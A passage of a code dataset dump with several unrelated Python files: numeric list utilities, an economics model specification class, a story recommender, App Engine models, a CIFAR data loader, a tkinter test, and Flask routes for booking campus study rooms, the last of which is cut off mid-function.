element in list_var is not an int, float,complex\n \"\"\"\n list_var = self.list\n try:\n import logging\n except ImportError:\n logging.warning('ImportError Logging')\n raise ImportError('Module Logging not found.')\n logging.basicConfig(filename='log.txt', level=logging.DEBUG)\n try:\n import numpy as np\n except ImportError:\n logging.warning('ImportError Numpy')\n raise ImportError('Module Numpy not found.')\n if len(list_var) == 0:\n raise ValueError('Input list is empty')\n try:\n import numbers\n except ImportError:\n logging.warning('ImportError 
Numbers')\n raise ImportError('Module Numbers not found.')\n if not isinstance(list_var, list):\n logging.warning('Input is not a list')\n for x in list_var:\n if isinstance(x, (int, float, complex)):\n continue\n else:\n logging.warning('List elements must be int, float or complex')\n raise TypeError('List elements must be int, float, or complex')\n logging.debug(list_var)\n value = np.sum(list_var)\n logging.info(value)\n self.list_add = value\n","sub_path":"numList.py","file_name":"numList.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
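A hypothetical usage sketch for the numList class above, assuming the record is saved as numList.py on the import path and numpy is installed (the input values are illustrative):

from numList import numList

nl = numList([3, 7, 2, 9])
print(nl.maxMin)    # (2, 9)
print(nl.max_diff)  # 7, from the adjacent pair (2, 9)
print(nl.list_add)  # 21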
+{"seq_id":"44463210","text":"\"\"\"This module includes the specification of the model.\"\"\"\nimport numpy as np\n\nfrom trempy.shared.shared_auxiliary import dist_class_attributes\nfrom trempy.shared.shared_auxiliary import print_init_dict\nfrom trempy.config_trempy import PREFERENCE_PARAMETERS\nfrom trempy.paras.clsParas import ParasCls\nfrom trempy.shared.clsBase import BaseCls\nfrom trempy.read.read import read\n\n\nclass ModelCls(BaseCls):\n \"\"\"This class manages all issues about the model specification.\"\"\"\n def __init__(self, fname):\n\n init_dict = read(fname)\n\n # We first tackle the more complex issue of parameter management.\n paras_obj = ParasCls(init_dict)\n\n self.attr = dict()\n\n # Parameters\n self.attr['paras_obj'] = paras_obj\n\n # Information\n upper = []\n upper += [init_dict['UNIATTRIBUTE SELF']['max']]\n upper += [init_dict['UNIATTRIBUTE OTHER']['max']]\n self.attr['upper'] = upper\n\n # Marginal utility functions\n marginals = []\n marginals += [init_dict['UNIATTRIBUTE SELF']['marginal']]\n marginals += [init_dict['UNIATTRIBUTE OTHER']['marginal']]\n self.attr['marginals'] = marginals\n\n # Cutoffs\n self.attr['cutoffs'] = init_dict['CUTOFFS']\n\n # Simulation\n self.attr['sim_agents'] = init_dict['SIMULATION']['agents']\n self.attr['sim_seed'] = init_dict['SIMULATION']['seed']\n self.attr['sim_file'] = init_dict['SIMULATION']['file']\n\n # Estimation\n self.attr['est_detailed'] = init_dict['ESTIMATION']['detailed']\n self.attr['optimizer'] = init_dict['ESTIMATION']['optimizer']\n\n self.attr['est_agents'] = init_dict['ESTIMATION']['agents']\n self.attr['num_skip'] = init_dict['ESTIMATION']['skip']\n self.attr['est_file'] = init_dict['ESTIMATION']['file']\n self.attr['maxfun'] = init_dict['ESTIMATION']['maxfun']\n self.attr['start'] = init_dict['ESTIMATION']['start']\n\n # Optimizer options\n self.attr['opt_options'] = dict()\n\n self.attr['opt_options']['SCIPY-BFGS'] = dict()\n self.attr['opt_options']['SCIPY-BFGS']['gtol'] = init_dict['SCIPY-BFGS']['gtol']\n self.attr['opt_options']['SCIPY-BFGS']['eps'] = init_dict['SCIPY-BFGS']['eps']\n\n self.attr['opt_options']['SCIPY-POWELL'] = dict()\n self.attr['opt_options']['SCIPY-POWELL']['xtol'] = init_dict['SCIPY-POWELL']['xtol']\n self.attr['opt_options']['SCIPY-POWELL']['ftol'] = init_dict['SCIPY-POWELL']['ftol']\n\n para_objs = paras_obj.get_attr('para_objs')\n\n questions = []\n for para_obj in para_objs:\n label = para_obj.get_attr('label')\n if label in PREFERENCE_PARAMETERS:\n continue\n\n questions += [label]\n\n self.attr['questions'] = sorted(questions)\n self.attr['num_questions'] = len(questions)\n\n # We now need to check the integrity of the class instance.\n self._check_integrity()\n\n def update(self, perspective, which, values):\n \"\"\"This method updates the estimation parameters.\"\"\"\n # Distribute class attributes\n paras_obj = self.attr['paras_obj']\n\n paras_obj.set_values(perspective, which, values)\n\n def write_out(self, fname):\n \"\"\"This method creates a initialization dictionary of the current class instance.\"\"\"\n init_dict = dict()\n\n labels = []\n labels += ['UNIATTRIBUTE SELF', 'UNIATTRIBUTE OTHER', 'MULTIATTRIBUTE COPULA']\n labels += ['QUESTIONS', 'CUTOFFS', 'ESTIMATION', 'SIMULATION']\n for label in labels:\n init_dict[label] = dict()\n\n paras_obj = self.attr['paras_obj']\n questions = self.attr['questions']\n\n # Preferences\n init_dict['UNIATTRIBUTE SELF']['marginal'] = self.attr['marginals'][0]\n init_dict['UNIATTRIBUTE SELF']['r'] = paras_obj.get_para('r_self')\n 
init_dict['UNIATTRIBUTE SELF']['max'] = self.attr['upper'][0]\n\n init_dict['UNIATTRIBUTE OTHER']['marginal'] = self.attr['marginals'][1]\n init_dict['UNIATTRIBUTE OTHER']['r'] = paras_obj.get_para('r_other')\n init_dict['UNIATTRIBUTE OTHER']['max'] = self.attr['upper'][1]\n\n init_dict['MULTIATTRIBUTE COPULA']['delta'] = paras_obj.get_para('delta')\n init_dict['MULTIATTRIBUTE COPULA']['self'] = paras_obj.get_para('self')\n init_dict['MULTIATTRIBUTE COPULA']['other'] = paras_obj.get_para('other')\n\n # Questions\n for q in questions:\n init_dict['QUESTIONS'][q] = paras_obj.get_para(q)\n\n # Cutoffs\n init_dict['CUTOFFS'] = self.attr['cutoffs']\n\n # Estimation\n init_dict['ESTIMATION']['detailed'] = self.attr['est_detailed']\n init_dict['ESTIMATION']['optimizer'] = self.attr['optimizer']\n init_dict['ESTIMATION']['agents'] = self.attr['est_agents']\n init_dict['ESTIMATION']['skip'] = self.attr['num_skip']\n init_dict['ESTIMATION']['file'] = self.attr['est_file']\n init_dict['ESTIMATION']['maxfun'] = self.attr['maxfun']\n init_dict['ESTIMATION']['start'] = self.attr['start']\n\n # Simulation\n init_dict['SIMULATION']['agents'] = self.attr['sim_agents']\n init_dict['SIMULATION']['seed'] = self.attr['sim_seed']\n init_dict['SIMULATION']['file'] = self.attr['sim_file']\n\n # Optimizer options\n init_dict['SCIPY-BFGS'] = dict()\n init_dict['SCIPY-BFGS']['gtol'] = self.attr['opt_options']['SCIPY-BFGS']['gtol']\n init_dict['SCIPY-BFGS']['eps'] = self.attr['opt_options']['SCIPY-BFGS']['eps']\n\n init_dict['SCIPY-POWELL'] = dict()\n init_dict['SCIPY-POWELL']['xtol'] = self.attr['opt_options']['SCIPY-POWELL']['xtol']\n init_dict['SCIPY-POWELL']['ftol'] = self.attr['opt_options']['SCIPY-POWELL']['ftol']\n\n print_init_dict(init_dict, fname)\n\n def _check_integrity(self):\n \"\"\"This method checks the integrity of the class instance.\"\"\"\n # Distribute class attributes for further processing.\n args = []\n args += ['paras_obj', 'sim_seed', 'sim_agents', 'sim_file', 'est_agents', 'maxfun']\n args += ['est_file', 'questions', 'start', 'num_skip']\n\n paras_obj, sim_seed, sim_agents, sim_file, est_agents, maxfun, est_file, questions, \\\n start, num_skip = dist_class_attributes(self, *args)\n\n # We restrict the identifiers for the questions to lie strictly between 12 and 46.\n np.testing.assert_equal(12 < min(questions) <= max(questions) < 46, True)\n\n # The number of skipped individuals has to be non-negative.\n np.testing.assert_equal(0 <= num_skip, True)\n\n # There are two alternatives for how to start the estimation.\n np.testing.assert_equal(start in ['init', 'auto'], True)\n","sub_path":"trempy/clsModel.py","file_name":"clsModel.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"379963352","text":"import recommend\r\nimport pageRankRecommender as PRR\r\nimport recommenderSurprise as RS\r\nimport app\r\nimport json\r\nimport collections\r\nfrom collections import Counter\r\nimport userInfo\r\n\r\nclass RecommendationCombination():\r\n def __init__(self, numEntities = 1000): \r\n self.userFavs = {}\r\n self.topStories = {}\r\n self.stories = []\r\n self.users = []\r\n self.reviews = [] \r\n with open('resultCleanup.jl') as f: \r\n cnt = 0\r\n for line in f:\r\n if cnt > numEntities:\r\n break\r\n cnt += 1\r\n j = json.loads(line)\r\n if j[\"pT\"] == \"user\":\r\n self.users.append(\r\n {\r\n 'name':j['name'], \r\n 'stories':j['stories'],\r\n 'favorites':j['favorites']\r\n })\r\n favAuthors = []\r\n favs = j[\"favorites\"]\r\n for elem in favs:\r\n favAuthors.append(elem[\"A\"])\r\n self.userFavs[j[\"name\"]] = set(favAuthors)\r\n\r\n if j[\"pT\"] == \"story\":\r\n favs = int(j[\"otherInfo\"][\"favorites\"])\r\n author = j[\"author\"]\r\n link = j[\"storyLink\"]\r\n \r\n self.stories.append({'storyLink':j[\"storyLink\"]})\r\n\r\n if author not in self.topStories:\r\n self.topStories[author] = (link, int(favs))\r\n else:\r\n #if the current top story for the author has less favorites than the new story then make the new story the top story. else don't change anything.\r\n if int(self.topStories[author][1]) < int(favs):\r\n self.topStories[author] = (link, int(favs)) \r\n if j[\"pT\"] == \"review\":\r\n item = {}\r\n item['rO'] = j['rO']\r\n item['r'] = j['r']\r\n item['sS'] = j['sS']\r\n self.reviews.append(item)\r\n\r\n self.prRecommender = PRR.pageRankRecommender(self.users, self.stories)\r\n self.sRecommender = RS.surpriseRecommender(self.stories, self.reviews, self.users)\r\n self.sRecommender.train()\r\n\r\n def getTopAuthors(self, link):\r\n\r\n favoriteAuthors = userInfo.getFavoriteAuthors(link)\r\n\r\n basicRecommendations = recommend.recommender(favoriteAuthors, self.userFavs, self.topStories)\r\n basicRecommendations = Counter({ x : y[0] for x, y in basicRecommendations.items()})\r\n pageRankRecommendations = Counter({link: score * .1 for link, score in self.prRecommender.predictBestAuthors().items()})\r\n\r\n combinedResults = dict(basicRecommendations + pageRankRecommendations)\r\n #print(len(basicRecommendations),len(pageRankRecommendations),len(combinedResults))\r\n combinedResults = [(link, score) for link, score in combinedResults.items()]\r\n combinedResults = sorted(combinedResults, key=lambda tup: tup[1], reverse=True)[:10]\r\n #print(combinedResults[:10])\r\n\r\n\r\n return [ x for x, y in combinedResults]\r\n\r\n def getTopStories(self, link):\r\n def scaleCounter(counter, scaler):\r\n return Counter({ link : score * scaler for link, score in counter.items()})\r\n\r\n pageRankRecommendations = Counter({link: score for link, score in self.prRecommender.predictBestStories().items()})\r\n pageRankRecommendations = scaleCounter(pageRankRecommendations, .1)\r\n surpriseRecommendations = Counter(self.sRecommender.predict(link, self.stories))\r\n surpriseRecommendations = scaleCounter(surpriseRecommendations, .9)\r\n\r\n combinedResults = pageRankRecommendations + surpriseRecommendations\r\n combinedResults = [(link, score) for link, score in combinedResults.items()]\r\n combinedResults = sorted(combinedResults, key=lambda tup: tup[1], reverse=True)[:10]\r\n print(combinedResults)\r\n return [ x for x, y in 
combinedResults]\r\n","sub_path":"RecommendationCombination.py","file_name":"RecommendationCombination.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
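The score merging in getTopAuthors/getTopStories above leans on the fact that adding two collections.Counter objects sums values key-wise. A standalone sketch of that trick with made-up links and scores:

from collections import Counter

basic = Counter({'story/1': 1.0, 'story/2': 0.4})
pagerank = {'story/2': 5.0, 'story/3': 2.0}
# Scale one source down, then let Counter addition merge the two rankings.
combined = basic + Counter({k: v * 0.1 for k, v in pagerank.items()})
ranked = sorted(combined.items(), key=lambda kv: kv[1], reverse=True)
print(ranked)  # [('story/1', 1.0), ('story/2', 0.9), ('story/3', 0.2)]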
+{"seq_id":"393710694","text":"from google.appengine.ext import db\n\n\n\nclass Feed(db.Model):\n owner = db.UserProperty(required=True)\n last_fetch = db.DateTimeProperty()\n url = db.StringProperty(required=True)\n title = db.StringProperty()\n is_valid = db.BooleanProperty(default=True)\n\n\nclass ReadyData(db.Model):\n DATA_TYPES = ('feed', 'page')\n\n content = db.TextProperty(default='')\n owner = db.UserProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n merged = db.IntegerProperty(default=1)\n data_type = db.StringProperty(choices=DATA_TYPES, required=True)\n\n def as_html_page(self):\n return '''\n \n \n \n \n Kindledump articles \n \n %s\n \n ''' % self.content\n","sub_path":"src/fetcher/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"181380966","text":"from torch.utils.data import dataset\nfrom torchvision import transforms\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader\nimport torchvision\nfrom PIL import Image\n\nsize = 32\ntrans = {\n 'train':\n transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop((size, size), padding=4),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010])\n ]),\n 'test':\n transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010])\n ])\n}\n\n\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\n\nclass CIFAR10(dataset.Dataset):\n def __init__(self, mode, root='./data/cifar-10-batches-py/'):\n assert mode in ['train', 'test'], print('mode must be \"train\" or \"test\"')\n data_root = root\n data_files = {'train': ['data_batch_%d' % x for x in range(1, 6)],\n 'test': ['test_batch']}\n self.imgs = None\n self.labels = []\n # self.class_names = self._unpickle(os.path.join(data_root, 'batches.meta'))[b'label_names]\n for f in data_files[mode]:\n data_dict = unpickle(os.path.join(data_root, f))\n data = data_dict[b'data'].reshape(-1, 3, 32, 32).transpose(0, 2, 3, 1)\n if self.imgs is None:\n self.imgs = data\n else:\n self.imgs = np.vstack((self.imgs, data))\n self.labels += data_dict[b'labels']\n\n self.trans = trans[mode]\n\n def __getitem__(self, index):\n img = Image.fromarray(self.imgs[index])\n label = self.labels[index]\n img = self.trans(img)\n\n return img, label\n\n def __len__(self):\n return len(self.labels)\n\n\nclass CIFAR100(dataset.Dataset):\n def __init__(self, mode, root='./data/cifar-100-py'):\n super().__init__()\n self.data_root = root\n\n data = unpickle(os.path.join(self.data_root, mode))\n print(data.keys())\n self.fnames = data[b'filenames']\n self.imgs = data[b'data'].reshape(-1, 3, 32, 32).transpose(0, 2, 3, 1)\n self.labels = data[b'fine_labels']\n self.corse = data[b'coarse_labels']\n self.trans = trans[mode]\n\n def __getitem__(self, index):\n img = Image.fromarray(self.imgs[index])\n label = self.labels[index]\n img = self.trans(img)\n\n return img, label\n\n def __len__(self):\n return len(self.labels)\n\n\ndef get_data(num_classes=10, root='./data/cifar-10-batches-py'):\n if num_classes == 10:\n Dataset = CIFAR10\n else:\n Dataset = CIFAR100\n\n trainset = Dataset(mode='train', root=root)\n testset = Dataset(mode='test', root=root)\n\n return trainset, testset\n\n\ndef imshow(inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = torchvision.utils.make_grid(inp)\n inp = inp.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n plt.show()\n\n\nif __name__ == '__main__':\n data = CIFAR10(mode='train', root='./data/cifar-10-batches-py')\n loader = DataLoader(data, batch_size=16, shuffle=True, num_workers=0)\n imgs, label = iter(loader).__next__()\n imshow(imgs)\n print(label)\n","sub_path":"cifar_data.py","file_name":"cifar_data.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"15730038","text":"from tkinter import *\n\n\ndef main():\n root = Tk()\n App(root)\n print(\"Main loop.\")\n root.mainloop()\n\nclass App:\n def __init__(self, master):\n self.master = master \n master.protocol(\"WM_DELETE_WINDOW\", self.handler) #Exit when x pressed, notice that its the name of the function 'self.handler' and not a method call self.handler()\n\n def handler(self):\n self.master.destroy()\n print(\"Destoy root window.\")\n self.master.quit()\n print(\"Quit main loop.\")\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tk_test2.py","file_name":"tk_test2.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513157010","text":"import os\nimport datetime\nimport requests\n\nfrom flask import jsonify, request\nfrom dateutil.parser import parse\n\nfrom server import app, db, sqldb\nfrom penn.base import APIError\nfrom .models import StudySpacesBooking, User\nfrom .penndata import studyspaces, wharton\nfrom .base import cached_route\n\n\ndef get_wharton_sessionid(public=False):\n \"\"\" Try to get a GSR session id. \"\"\"\n sessionid = request.args.get('sessionid')\n cache_key = 'studyspaces:gsr:sessionid'\n\n if sessionid:\n return sessionid\n\n if public:\n if db.exists(cache_key):\n return db.get(cache_key).decode('utf8')\n\n return os.environ.get('GSR_SESSIONID')\n\n return None\n\n\ndef save_wharton_sessionid():\n sessionid = request.args.get('sessionid')\n cache_key = 'studyspaces:gsr:sessionid'\n\n if sessionid:\n db.set(cache_key, sessionid, ex=604800)\n\n\n@app.route('/studyspaces/gsr', methods=['GET'])\ndef get_wharton_gsrs_temp_route():\n \"\"\" Temporary endpoint to allow non-authenticated users to access the list of GSRs. \"\"\"\n date = request.args.get('date')\n try:\n data = wharton.get_wharton_gsrs(get_wharton_sessionid(public=True), date)\n save_wharton_sessionid()\n return jsonify(data)\n except APIError as error:\n return jsonify({'error': str(error)}), 400\n\n\n@app.route('/studyspaces/gsr/reservations', methods=['GET'])\ndef get_wharton_gsr_reservations():\n \"\"\"\n Returns JSON containing a list of Wharton GSR reservations.\n \"\"\"\n\n sessionid = get_wharton_sessionid()\n\n if not sessionid:\n return jsonify({'error': 'No Session ID provided.'})\n\n try:\n reservations = wharton.get_reservations(sessionid)\n save_wharton_sessionid()\n return jsonify({'reservations': reservations})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n\n\n@app.route('/studyspaces/gsr/delete', methods=['POST'])\ndef delete_wharton_gsr_reservation():\n \"\"\"\n Deletes a Wharton GSR reservation\n \"\"\"\n booking = request.form.get('booking')\n sessionid = request.form.get('sessionid')\n if not booking:\n return jsonify({\"error\": \"No booking sent to server.\"})\n if not sessionid:\n return jsonify({\"error\": \"No session id sent to server.\"})\n\n try:\n result = wharton.delete_booking(sessionid, booking)\n save_wharton_sessionid()\n return jsonify({'result': result})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n\n\n@app.route('/studyspaces/availability/', methods=['GET'])\ndef parse_times(building):\n \"\"\"\n Returns JSON containing all rooms for a given building.\n\n Usage:\n /studyspaces/availability/ gives all rooms for the next 24 hours\n /studyspaces/availability/?start=2018-25-01 gives all rooms in the start date\n /studyspaces/availability/?start=...&end=... 
gives all rooms between the two days\n \"\"\"\n if 'date' in request.args:\n start = request.args.get('date')\n end = request.args.get('date')\n else:\n start = request.args.get('start')\n end = request.args.get('end')\n\n if building == 1:\n sessionid = get_wharton_sessionid(public=True)\n try:\n rooms = wharton.get_wharton_gsrs(sessionid, date=start)\n rooms = wharton.switch_format(rooms)\n save_wharton_sessionid()\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n else:\n try:\n rooms = studyspaces.get_rooms(building, start, end)\n rooms[\"location_id\"] = rooms[\"id\"]\n rooms[\"rooms\"] = []\n for room_list in rooms[\"categories\"]:\n for room in room_list[\"rooms\"]:\n room[\"thumbnail\"] = room[\"image\"]\n del room[\"image\"]\n room[\"room_id\"] = room[\"id\"]\n del room[\"id\"]\n room[\"gid\"] = room_list[\"cid\"]\n room[\"lid\"] = building\n room[\"times\"] = room[\"availability\"]\n del room[\"availability\"]\n for time in room[\"times\"]:\n time[\"available\"] = True\n time[\"start\"] = time[\"from\"]\n time[\"end\"] = time[\"to\"]\n del time[\"from\"]\n del time[\"to\"]\n rooms[\"rooms\"].append(room)\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n return jsonify(rooms)\n\n\n@app.route('/studyspaces/locations', methods=['GET'])\ndef display_id_pairs():\n \"\"\"\n Returns JSON containing a list of buildings with their ids.\n \"\"\"\n def get_data():\n return {\"locations\": studyspaces.get_buildings() + [{\"lid\": 1, \"name\": \"Huntsman Hall\", \"service\": \"wharton\"}]}\n\n return cached_route('studyspaces:locations', datetime.timedelta(days=1), get_data)\n\n\n@app.route('/studyspaces/cancel', methods=['POST'])\ndef cancel_room():\n \"\"\"\n Cancels a booked room.\n \"\"\"\n try:\n user = User.get_user()\n except ValueError as err:\n return jsonify({\"error\": str(err)})\n\n booking_id = request.form.get(\"booking_id\")\n if not booking_id:\n return jsonify({\"error\": \"No booking id sent to server!\"})\n if \",\" in booking_id:\n return jsonify({\"error\": \"Only one booking may be cancelled at a time.\"})\n\n booking = StudySpacesBooking.query.filter_by(booking_id=booking_id).first()\n if booking:\n if (booking.user is not None) and (booking.user != user.id):\n return jsonify({\"error\": \"Unauthorized: This reservation was booked by someone else.\"}), 400\n if booking.is_cancelled:\n return jsonify({\"error\": \"This reservation has already been cancelled.\"}), 400\n\n if booking_id.isdigit():\n sessionid = request.form.get(\"sessionid\")\n if not sessionid:\n return jsonify({\"error\": \"No session id sent to server.\"}), 400\n try:\n wharton.delete_booking(sessionid, booking_id)\n save_wharton_sessionid()\n if booking:\n booking.is_cancelled = True\n sqldb.session.commit()\n else:\n save_booking(\n lid=1,\n email=user.email,\n booking_id=booking_id,\n is_cancelled=True,\n user=user.id\n )\n return jsonify({'result': [{\"booking_id\": booking_id, \"cancelled\": True}]})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n else:\n resp = studyspaces.cancel_room(booking_id)\n if \"error\" not in resp:\n if booking:\n booking.is_cancelled = True\n sqldb.session.commit()\n else:\n save_booking(\n email=user.email,\n booking_id=booking_id,\n is_cancelled=True,\n user=user.id\n )\n return jsonify({'result': resp})\n\n\n@app.route('/studyspaces/book', methods=['POST'])\ndef book_room():\n \"\"\"\n Books a room.\n \"\"\"\n try:\n room = int(request.form[\"room\"])\n except (KeyError, ValueError):\n return 
jsonify({\"results\": False, \"error\": \"Please specify a correct room id!\"}), 400\n\n try:\n start = parse(request.form[\"start\"])\n end = parse(request.form[\"end\"])\n except KeyError:\n return jsonify({\"results\": False, \"error\": \"No start and end parameters passed to server!\"}), 400\n\n try:\n lid = int(request.form[\"lid\"])\n except (KeyError, ValueError):\n lid = None\n\n email = None\n\n if lid == 1:\n sessionid = request.form.get(\"sessionid\")\n if not sessionid:\n return jsonify({\"results\": False, \"error\": \"You must pass a sessionid when booking a Wharton GSR!\"}), 400\n resp = wharton.book_reservation(sessionid, room, start, end)\n resp[\"results\"] = resp[\"success\"]\n room_booked = resp[\"success\"]\n del resp[\"success\"]\n if room_booked:\n save_wharton_sessionid()\n booking_id = None\n\n # Look up the reservation to get the booking id\n reservations = get_reservations(None, sessionid, 0)\n startStr = request.form[\"start\"].split(\"-\")[0]\n endStr = request.form[\"end\"].split(\"-\")[0]\n for reservation in reservations:\n resStartStr = reservation[\"fromDate\"].split(\"-\")[0]\n resEndStr = reservation[\"toDate\"].split(\"-\")[0]\n if startStr == resStartStr and endStr == resEndStr:\n booking_id = reservation[\"booking_id\"]\n break\n else:\n contact = {}\n for arg, field in [(\"fname\", \"firstname\"), (\"lname\", \"lastname\"), (\"email\", \"email\"), (\"nickname\", \"groupname\")]:\n try:\n contact[arg] = request.form[field]\n except KeyError:\n return jsonify({\"results\": False, \"error\": \"'{}' is a required parameter!\".format(field)})\n\n email = contact.get(\"email\")\n contact[\"custom\"] = {}\n contact[\"custom\"][\"q3699\"] = get_affiliation(email)\n for arg, field in [(\"q2533\", \"phone\"), (\"q2555\", \"size\"), (\"q2537\", \"size\"), (\"q3699\", \"affiliation\")]:\n try:\n contact[\"custom\"][arg] = request.form[field]\n except KeyError:\n pass\n\n resp = studyspaces.book_room(room, start.isoformat(), end.isoformat(), **contact)\n room_booked = resp.get(\"results\")\n booking_id = resp.get(\"booking_id\")\n\n try:\n user = User.get_user()\n user_id = user.id\n if email and user.email != email:\n user.email = email\n sqldb.session.commit()\n else:\n email = user.email\n except ValueError:\n user_id = None\n\n if room_booked:\n save_booking(\n lid=lid,\n rid=room,\n email=email,\n start=start.replace(tzinfo=None),\n end=end.replace(tzinfo=None),\n booking_id=booking_id,\n user=user_id\n )\n return jsonify(resp)\n\n\ndef get_affiliation(email):\n if \"wharton\" in email:\n return \"Wharton\"\n elif \"seas\" in email:\n return \"SEAS\"\n elif \"sas\" in email:\n return \"SAS\"\n else:\n return \"Other\"\n\n\n@app.route('/studyspaces/reservations', methods=['GET'])\ndef get_reservations_endpoint():\n \"\"\"\n Gets a users reservations.\n \"\"\"\n\n email = request.args.get('email')\n sessionid = request.args.get('sessionid')\n if not email and not sessionid:\n return jsonify({\"error\": \"A session id or email must be sent to server.\"}), 400\n\n libcal_search_span = request.args.get(\"libcal_search_span\")\n if libcal_search_span:\n try:\n libcal_search_span = int(libcal_search_span)\n except ValueError:\n return jsonify({\"error\": \"Search span must be an integer.\"}), 400\n else:\n libcal_search_span = 3\n\n try:\n reservations = get_reservations(email, sessionid, libcal_search_span)\n return jsonify({'reservations': reservations})\n except APIError as e:\n return jsonify({\"error\": str(e)}), 400\n\n\ndef get_reservations(email, sessionid, 
libcal_search_span, timeout=20):\n reservations = []\n if sessionid:\n try:\n gsr_reservations = wharton.get_reservations(sessionid, timeout)\n timezone = wharton.get_dst_gmt_timezone()\n\n for res in gsr_reservations:\n res[\"service\"] = \"wharton\"\n res[\"booking_id\"] = str(res[\"booking_id\"])\n res[\"name\"] = res[\"location\"]\n res[\"gid\"] = 1\n res[\"lid\"] = 1\n res[\"info\"] = None\n del res[\"location\"]\n\n date = datetime.datetime.strptime(res[\"date\"], \"%b %d, %Y\")\n date_str = datetime.datetime.strftime(date, \"%Y-%m-%d\")\n\n if res[\"startTime\"] == \"midnight\":\n res[\"fromDate\"] = date_str + \"T00:00:00-{}\".format(timezone)\n elif res[\"startTime\"] == \"noon\":\n res[\"fromDate\"] = date_str + \"T12:00:00-{}\".format(timezone)\n else:\n start_str = res[\"startTime\"].replace(\".\", \"\").upper()\n try:\n start_time = datetime.datetime.strptime(start_str, \"%I:%M %p\")\n except ValueError:\n start_time = datetime.datetime.strptime(start_str, \"%I %p\")\n start_str = datetime.datetime.strftime(start_time, \"%H:%M:%S\")\n res[\"fromDate\"] = \"{}T{}-{}\".format(date_str, start_str, timezone)\n\n if res[\"endTime\"] == \"midnight\":\n date += datetime.timedelta(days=1)\n date_str = datetime.datetime.strftime(date, \"%Y-%m-%d\")\n res[\"toDate\"] = date_str + \"T00:00:00-{}\".format(timezone)\n elif res[\"endTime\"] == \"noon\":\n res[\"toDate\"] = date_str + \"T12:00:00-{}\".format(timezone)\n else:\n end_str = res[\"endTime\"].replace(\".\", \"\").upper()\n try:\n end_time = datetime.datetime.strptime(end_str, \"%I:%M %p\")\n except ValueError:\n end_time = datetime.datetime.strptime(end_str, \"%I %p\")\n end_str = datetime.datetime.strftime(end_time, \"%H:%M:%S\")\n res[\"toDate\"] = \"{}T{}-{}\".format(date_str, end_str, timezone)\n\n del res[\"date\"]\n del res[\"startTime\"]\n del res[\"endTime\"]\n\n reservations.extend(gsr_reservations)\n\n except APIError:\n pass\n\n if email:\n confirmed_reservations = []\n try:\n def is_not_cancelled_in_db(booking_id):\n booking = StudySpacesBooking.query.filter_by(booking_id=booking_id).first()\n return not (booking and booking.is_cancelled)\n\n now = datetime.datetime.now()\n dateFormat = \"%Y-%m-%d\"\n i = 0\n while len(confirmed_reservations) == 0 and i < libcal_search_span:\n date = now + datetime.timedelta(days=i)\n dateStr = datetime.datetime.strftime(date, dateFormat)\n libcal_reservations = studyspaces.get_reservations(email, dateStr, timeout)\n confirmed_reservations = [res for res in libcal_reservations if (type(res) == dict and res[\"status\"] == \"Confirmed\"\n and datetime.datetime.strptime(res[\"toDate\"][:-6], \"%Y-%m-%dT%H:%M:%S\") >= now)]\n confirmed_reservations = [res for res in confirmed_reservations if is_not_cancelled_in_db(res[\"bookId\"])]\n i += 1\n\n except APIError:\n pass\n\n # Fetch reservations in database that are not being returned by API\n db_bookings = StudySpacesBooking.query.filter_by(email=email)\n db_booking_ids = [str(x.booking_id) for x in db_bookings if x.end\n and x.end > now\n and not str(x.booking_id).isdigit()\n and not x.is_cancelled]\n reservation_ids = [x[\"bookId\"] for x in confirmed_reservations]\n missing_booking_ids = list(set(db_booking_ids) - set(reservation_ids))\n if missing_booking_ids:\n missing_bookings_str = \",\".join(missing_booking_ids)\n missing_reservations = studyspaces.get_reservations_for_booking_ids(missing_bookings_str)\n confirmed_missing_reservations = [res for res in missing_reservations if res[\"status\"] == \"Confirmed\"]\n 
